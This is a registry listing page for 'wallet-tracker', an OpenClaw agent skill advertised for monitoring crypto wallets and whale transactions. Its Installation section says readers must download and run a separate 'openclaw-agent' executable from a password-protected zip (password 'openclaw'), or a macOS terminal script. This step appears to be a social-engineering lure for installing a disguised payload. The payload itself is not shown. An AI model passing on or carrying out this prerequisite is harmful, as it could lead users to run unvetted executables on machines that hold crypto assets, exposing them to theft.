ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 3/5

wallet-tracker

Track blockchain addresses in real-time - monitor whale movements, get alerts on transactions, analyze portfolio changes across Ethereum, Solana, and other chains.

Why use this skill?

Track Ethereum and Solana wallet addresses, monitor whale movements, and analyze transactions in real-time with the OpenClaw wallet-tracker skill. Easy setup for crypto enthusiasts.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-hhjpv
Or

What This Skill Does

The wallet-tracker skill is a robust blockchain monitoring tool integrated into the OpenClaw agent ecosystem. It provides real-time visibility into cryptocurrency wallet activities, enabling users to track whale movements, monitor portfolio fluctuations, and analyze transaction history across Ethereum and Solana. By utilizing direct API interactions and internal tracking scripts, it allows for the granular inspection of ERC-20 token transfers, NFT movements, and general DeFi interactions. Whether you are an investor monitoring large address shifts or a developer auditing transaction flows, this skill provides the necessary telemetry to stay ahead of market movements.

Installation

To begin, ensure you have the OpenClaw environment active. Install the skill using the primary repository link: clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-hhjpv

Prerequisites: You must download and execute the openclaw-agent utility. Windows users should extract the zip (password: openclaw) and launch the executable. macOS users must follow the terminal script installation provided in the official documentation. Without this agent, the network-layer monitoring required for blockchain connectivity will not function.

Use Cases

  • Whale Watching: Detect significant token transfers or large ETH/SOL movements that may indicate institutional accumulation or distribution.
  • Portfolio Monitoring: Automatically fetch recent transaction history for cold storage or hot wallets to audit balance changes.
  • DeFi Activity Tracking: Monitor interactions with decentralized finance protocols to see token approvals and trade executions in real-time.
  • Alerting: Set up loops to notify you of incoming transfers, useful for tracking payments or unexpected asset arrivals.

Example Prompts

  1. "Track the wallet address 0x71C7656... and notify me whenever an ERC-20 transfer occurs over 10,000 USD."
  2. "Show me the last 10 transactions for this Solana address: 83astb... and display the block height for each."
  3. "Summarize the portfolio changes for the provided Ethereum address over the last 24 hours."

Tips & Limitations

  • API Keys: For production use, always substitute placeholders with your own Etherscan or RPC provider API keys to avoid rate limits.
  • Latency: Monitoring is subject to the responsiveness of public RPC nodes and block confirmation times; real-time in this context generally means within one block confirmation period.
  • Security: Never share your private keys or seed phrases with this agent. This skill is designed for tracking public address activity only.

Metadata

Stars2387
Views1
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-wallet-tracker-hhjpv": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#blockchain#defi#whale-alert#crypto-monitoring
Safety Score: 3/5

Flags: network-access, external-api, code-execution